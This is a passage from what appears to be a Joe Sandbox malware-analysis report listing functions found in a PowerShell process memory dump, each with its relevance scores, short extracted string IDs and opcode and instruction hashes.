                                                                • Opcode Fuzzy Hash: b54005b646c6b40b87e82e058865b546fa9fbfd6e03b775b7e9b0b7e3cb53c17
                                                                • Instruction Fuzzy Hash: 11F125F170420ADFEB55AF68C8447AABFA2EF81311F1484EBE4158B295DB31D851CBB1
                                                                Function 07B8E1C4 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XRdq$XRdq$tP_q$$_q
                                                                • API String ID: 0-4159955686
                                                                • Opcode ID: f9ffe7a635d564be857591212e272d24be6c5ee193ccf8154cc11789c1eaddc8
                                                                • Instruction ID: bb328a90d3b6891d5d7723b5fbcdb04ceb5ea89bf71ccd58b7c70287ffe7a149
                                                                • Opcode Fuzzy Hash: f9ffe7a635d564be857591212e272d24be6c5ee193ccf8154cc11789c1eaddc8
                                                                • Instruction Fuzzy Hash: C341C2F1A00206DFEB65EF18C104AA9BBF2EB49711F19C0EAE418AF255C731DD41CB51
                                                                Function 07B8E1D8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XRdq$XRdq$tP_q$$_q
                                                                • API String ID: 0-4159955686
                                                                • Opcode ID: 0085a80d61ae7b7b77a77f9ebf13d88cc805f7f29e645ea5bffe441e0ff6939b
                                                                • Instruction ID: a2c2711fd157170558681f7bab9ecbcbc57e15d1007fd7ae4b877ee284f6d13f
                                                                • Opcode Fuzzy Hash: 0085a80d61ae7b7b77a77f9ebf13d88cc805f7f29e645ea5bffe441e0ff6939b
                                                                • Instruction Fuzzy Hash: 7641B2F1A00216DBEBA4EF59C144BAAB7F2EB49710F19C0E9E8186B254C731ED41CB51
                                                                Function 07B81070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q
                                                                • API String ID: 0-1171383116
                                                                • Opcode ID: c12bc9bf2bc7f3d033676eb03e663213ce80762d4078d99c7e9ae4d3e5d55271
                                                                • Instruction ID: cad5b520fe685554af028e17d7dba6604201536761cdd0b211ce1d0957c83977
                                                                • Opcode Fuzzy Hash: c12bc9bf2bc7f3d033676eb03e663213ce80762d4078d99c7e9ae4d3e5d55271
                                                                • Instruction Fuzzy Hash: 2B2157F131120E9BFB68766E8C40B27A6DADBC0715F3084BEA519CB285DD75C842C360
                                                                Function 07B88AFE Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q
                                                                • API String ID: 0-1171383116
                                                                • Opcode ID: 519c025e883949e4a66146df10fa4bb41e519d6554f160e0b30c7f700519c057
                                                                • Instruction ID: e4b21bd51f3a8cfb37a9aa65fcb8f1eb12fe8a156b24b2b7e3b8cfc1cdaa832e
                                                                • Opcode Fuzzy Hash: 519c025e883949e4a66146df10fa4bb41e519d6554f160e0b30c7f700519c057
                                                                • Instruction Fuzzy Hash: F111DCF5A2130BDBEBA4AE558540666B7E5EFC5650F9840EAE8089B301C732C945CB52
                                                                Function 07B81C68 Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$$_q$$_q
                                                                • API String ID: 0-1173716036
                                                                • Opcode ID: b2bf50203bd87e2d81973ac624dc2233531f15fecfdc49f2d816791c7b6162aa
                                                                • Instruction ID: ab4cd71bef8a652e4d825fd7d3eb9e402b5e72e29aa71532ae8476a6c974d418
                                                                • Opcode Fuzzy Hash: b2bf50203bd87e2d81973ac624dc2233531f15fecfdc49f2d816791c7b6162aa
                                                                • Instruction Fuzzy Hash: 780126F070A34A5FD32D166D44242266FF69FC2A10B1588EFD091DF295CD55CC07CB96